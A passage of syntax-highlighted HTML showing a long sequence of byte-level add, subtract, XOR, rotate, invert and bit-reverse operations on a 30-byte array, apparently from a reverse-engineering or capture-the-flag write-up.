class="number">4</span>]+=f[<span class="number">3</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">26</span>]+=f[<span class="number">22</span>],f[<span class="number">26</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">16</span>]=f[<span class="number">16</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">16</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">11</span>]+=f[<span class="number">8</span>],f[<span class="number">11</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]^=f[<span class="number">9</span>]</span><br><span class="line">f[<span class="number">24</span>]+=f[<span class="number">14</span>],f[<span class="number">24</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">29</span>]-=f[<span class="number">24</span>],f[<span class="number">29</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]-=f[<span class="number">18</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]=f[<span class="number">1</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">1</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">20</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">20</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">20</span>]=~f[<span class="number">20</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]^=f[<span class="number">2</span>]</span><br><span class="line">f[<span class="number">20</span>]-=f[<span class="number">24</span>],f[<span class="number">20</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">2</span>]+=f[<span class="number">6</span>],f[<span class="number">2</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">10</span>]+=f[<span class="number">24</span>],f[<span class="number">10</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">25</span>]=f[<span class="number">25</span>]^(f[<span class="number">25</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">12</span>]^=f[<span class="number">14</span>]</span><br><span class="line">f[<span class="number">25</span>]=f[<span class="number">25</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">25</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">15</span>]=f[<span class="number">15</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">15</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">25</span>]+=f[<span class="number">12</span>],f[<span class="number">25</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">2</span>]+=f[<span class="number">5</span>],f[<span class="number">2</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">0</span>]-=f[<span class="number">11</span>],f[<span class="number">0</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]-=f[<span class="number">1</span>],f[<span class="number">6</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]+=f[<span class="number">17</span>],f[<span class="number">6</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">29</span>]-=f[<span class="number">9</span>],f[<span class="number">29</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">7</span>]=~f[<span class="number">7</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">2</span>]+=f[<span class="number">5</span>],f[<span class="number">2</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">22</span>]-=f[<span class="number">2</span>],f[<span class="number">22</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">24</span>]=f[<span class="number">24</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">24</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]^(f[<span class="number">20</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">28</span>]=f[<span class="number">28</span>]^(f[<span class="number">28</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">15</span>]^=f[<span class="number">20</span>]</span><br><span class="line">f[<span class="number">3</span>]=f[<span class="number">3</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">3</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">18</span>]=~f[<span class="number">18</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">13</span>]=f[<span class="number">13</span>]^(f[<span class="number">13</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">15</span>]-=f[<span class="number">2</span>],f[<span class="number">15</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">9</span>]+=f[<span class="number">20</span>],f[<span class="number">9</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">1</span>]-=f[<span class="number">13</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">0</span>]-=f[<span class="number">4</span>],f[<span class="number">0</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">14</span>]=~f[<span class="number">14</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">14</span>]=f[<span class="number">14</span>]^(f[<span class="number">14</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">24</span>]-=f[<span class="number">7</span>],f[<span class="number">24</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">16</span>]^=f[<span class="number">6</span>]</span><br><span class="line">f[<span class="number">13</span>]+=f[<span class="number">9</span>],f[<span class="number">13</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]-=f[<span class="number">10</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">28</span>]=f[<span class="number">28</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">28</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">25</span>]-=f[<span class="number">22</span>],f[<span class="number">25</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">14</span>]=f[<span class="number">14</span>]^(f[<span class="number">14</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">2</span>]=f[<span class="number">2</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">2</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">2</span>]^=f[<span class="number">15</span>]</span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">3</span>]-=f[<span class="number">22</span>],f[<span class="number">3</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">23</span>]=f[<span class="number">23</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">23</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">9</span>]+=f[<span class="number">16</span>],f[<span class="number">9</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">7</span>]=f[<span class="number">7</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">7</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">6</span>]=~f[<span class="number">6</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">5</span>]+=f[<span class="number">15</span>],f[<span class="number">5</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]-=f[<span class="number">17</span>],f[<span class="number">6</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">7</span>]-=f[<span class="number">6</span>],f[<span class="number">7</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">3</span>]+=f[<span class="number">28</span>],f[<span class="number">3</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]^=f[<span class="number">18</span>]</span><br><span class="line">f[<span class="number">22</span>]-=f[<span class="number">5</span>],f[<span class="number">22</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">14</span>]-=f[<span class="number">2</span>],f[<span class="number">14</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">21</span>]^=f[<span class="number">22</span>]</span><br><span class="line">f[<span class="number">4</span>]-=f[<span class="number">29</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">26</span>]=(((f[<span class="number">26</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">26</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">17</span>]-=f[<span class="number">18</span>],f[<span class="number">17</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">16</span>]-=f[<span class="number">3</span>],f[<span class="number">16</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">25</span>]^=f[<span class="number">21</span>]</span><br><span class="line">f[<span class="number">14</span>]+=f[<span class="number">9</span>],f[<span class="number">14</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]+=f[<span class="number">13</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">0</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">1</span>]^=f[<span class="number">28</span>]</span><br><span class="line">f[<span class="number">14</span>]=~f[<span class="number">14</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">27</span>]=(((f[<span class="number">27</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">27</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">9</span>]^=f[<span class="number">2</span>]</span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">13</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">5</span>]^=f[<span class="number">13</span>]</span><br><span class="line">f[<span class="number">10</span>]^=f[<span class="number">0</span>]</span><br><span class="line">f[<span class="number">12</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">2</span>]=~f[<span class="number">2</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]=f[<span class="number">1</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">1</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">9</span>]^=f[<span class="number">28</span>]</span><br><span class="line">f[<span class="number">3</span>]=(((f[<span class="number">3</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">3</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">19</span>]=f[<span class="number">19</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">19</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">16</span>]-=f[<span class="number">9</span>],f[<span class="number">16</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]=f[<span class="number">8</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">8</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">28</span>]=f[<span class="number">28</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">28</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">12</span>]-=f[<span class="number">3</span>],f[<span class="number">12</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">25</span>]=(((f[<span class="number">25</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">25</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">14</span>]=(((f[<span class="number">14</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">14</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">6</span>]+=f[<span class="number">28</span>],f[<span class="number">6</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]^=f[<span class="number">5</span>]</span><br><span class="line">f[<span class="number">28</span>]^=f[<span class="number">0</span>]</span><br><span class="line">f[<span class="number">10</span>]-=f[<span class="number">22</span>],f[<span class="number">10</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]=f[<span class="number">8</span>]^(f[<span class="number">8</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">19</span>]=f[<span class="number">19</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">19</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">26</span>]-=f[<span class="number">14</span>],f[<span class="number">26</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">25</span>]^=f[<span class="number">28</span>]</span><br><span class="line">f[<span class="number">15</span>]-=f[<span class="number">17</span>],f[<span class="number">15</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">12</span>]^=f[<span class="number">4</span>]</span><br><span class="line">f[<span class="number">25</span>]+=f[<span class="number">4</span>],f[<span class="number">25</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]=~f[<span class="number">11</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]=f[<span class="number">1</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">1</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">9</span>]+=f[<span class="number">28</span>],f[<span class="number">9</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]^=f[<span class="number">18</span>]</span><br><span class="line">f[<span class="number">15</span>]=~f[<span class="number">15</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">12</span>]=f[<span class="number">12</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">12</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">12</span>]=f[<span class="number">12</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">12</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">2</span>]=f[<span class="number">2</span>]^(f[<span class="number">2</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">6</span>]=~f[<span class="number">6</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">10</span>]=f[<span class="number">10</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">10</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]^(f[<span class="number">20</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">20</span>]+=f[<span class="number">24</span>],f[<span class="number">20</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]=f[<span class="number">4</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">4</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">16</span>]^=f[<span class="number">11</span>]</span><br><span class="line">f[<span class="number">8</span>]=~f[<span class="number">8</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]=(((f[<span class="number">1</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">1</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]+=f[<span class="number">18</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">5</span>]=f[<span class="number">5</span>]^(f[<span class="number">5</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">25</span>]-=f[<span class="number">4</span>],f[<span class="number">25</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">9</span>]^=f[<span class="number">26</span>]</span><br><span class="line">f[<span class="number">5</span>]^=f[<span class="number">3</span>]</span><br><span class="line">f[<span class="number">4</span>]^=f[<span class="number">2</span>]</span><br><span class="line">f[<span class="number">29</span>]-=f[<span class="number">21</span>],f[<span class="number">29</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">20</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">24</span>]^=f[<span class="number">27</span>]</span><br><span class="line">f[<span class="number">8</span>]+=f[<span class="number">16</span>],f[<span class="number">8</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">22</span>]=f[<span class="number">22</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">22</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">3</span>]=f[<span class="number">3</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">3</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">10</span>]-=f[<span class="number">9</span>],f[<span class="number">10</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">9</span>]=f[<span class="number">9</span>]^(f[<span class="number">9</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">24</span>]^=f[<span class="number">25</span>]</span><br><span class="line">f[<span class="number">9</span>]=~f[<span class="number">9</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]=f[<span class="number">1</span>]^(f[<span class="number">1</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">19</span>]=f[<span class="number">19</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">19</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">7</span>]=f[<span class="number">7</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">7</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">21</span>]+=f[<span class="number">25</span>],f[<span class="number">21</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">28</span>]-=f[<span class="number">0</span>],f[<span class="number">28</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">18</span>]=f[<span class="number">18</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">18</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">20</span>]^=f[<span class="number">5</span>]</span><br><span class="line">f[<span class="number">17</span>]^=f[<span class="number">12</span>]</span><br><span class="line">f[<span class="number">22</span>]-=f[<span class="number">23</span>],f[<span class="number">22</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">18</span>]+=f[<span class="number">25</span>],f[<span class="number">18</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]=f[<span class="number">4</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">4</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">0</span>]=f[<span class="number">0</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">0</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">29</span>]=f[<span class="number">29</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">29</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">7</span>]^=f[<span class="number">21</span>]</span><br><span class="line">f[<span class="number">8</span>]-=f[<span class="number">17</span>],f[<span class="number">8</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">10</span>]+=f[<span class="number">22</span>],f[<span class="number">10</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]-=f[<span class="number">18</span>],f[<span class="number">8</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">21</span>]+=f[<span class="number">0</span>],f[<span class="number">21</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">15</span>]^=f[<span class="number">20</span>]</span><br><span class="line">f[<span class="number">1</span>]=f[<span class="number">1</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">1</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">14</span>]=f[<span class="number">14</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">14</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">13</span>]^=f[<span class="number">2</span>]</span><br><span class="line">f[<span class="number">9</span>]^=f[<span class="number">6</span>]</span><br><span class="line">f[<span class="number">15</span>]-=f[<span class="number">8</span>],f[<span class="number">15</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">6</span>]=f[<span class="number">6</span>]^(f[<span class="number">6</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">21</span>]^=f[<span class="number">5</span>]</span><br><span class="line">f[<span class="number">17</span>]^=f[<span class="number">13</span>]</span><br><span class="line">f[<span class="number">12</span>]-=f[<span class="number">8</span>],f[<span class="number">12</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">19</span>]^=f[<span class="number">12</span>]</span><br><span class="line">f[<span class="number">2</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">25</span>]=f[<span class="number">25</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">25</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">19</span>]=f[<span class="number">19</span>]^(f[<span class="number">19</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">0</span>]=f[<span class="number">0</span>]^(f[<span class="number">0</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">17</span>]+=f[<span class="number">27</span>],f[<span class="number">17</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">20</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">28</span>]-=f[<span class="number">13</span>],f[<span class="number">28</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">22</span>]=~f[<span class="number">22</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">26</span>]^=f[<span class="number">17</span>]</span><br><span class="line">f[<span class="number">10</span>]=f[<span class="number">10</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">10</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">24</span>]=~f[<span class="number">24</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]-=f[<span class="number">22</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]-=f[<span class="number">20</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">24</span>]+=f[<span class="number">12</span>],f[<span class="number">24</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">13</span>]=f[<span class="number">13</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">13</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">2</span>]=f[<span class="number">2</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">2</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">1</span>]-=f[<span class="number">24</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]^=f[<span class="number">27</span>]</span><br><span class="line">f[<span class="number">14</span>]=f[<span class="number">14</span>]^(f[<span class="number">14</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]^(f[<span class="number">17</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">21</span>]=f[<span class="number">21</span>]^(f[<span class="number">21</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">24</span>]=(((f[<span class="number">24</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">24</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">12</span>]=f[<span class="number">12</span>]^(f[<span class="number">12</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">3</span>]=f[<span class="number">3</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">3</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">8</span>]+=f[<span class="number">1</span>],f[<span class="number">8</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">21</span>]+=f[<span class="number">18</span>],f[<span class="number">21</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">0</span>]+=f[<span class="number">22</span>],f[<span class="number">0</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]=f[<span class="number">4</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">4</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">25</span>]=f[<span class="number">25</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">25</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">10</span>]=f[<span class="number">10</span>]&lt;&lt;<span class="number">7</span>&amp;<span 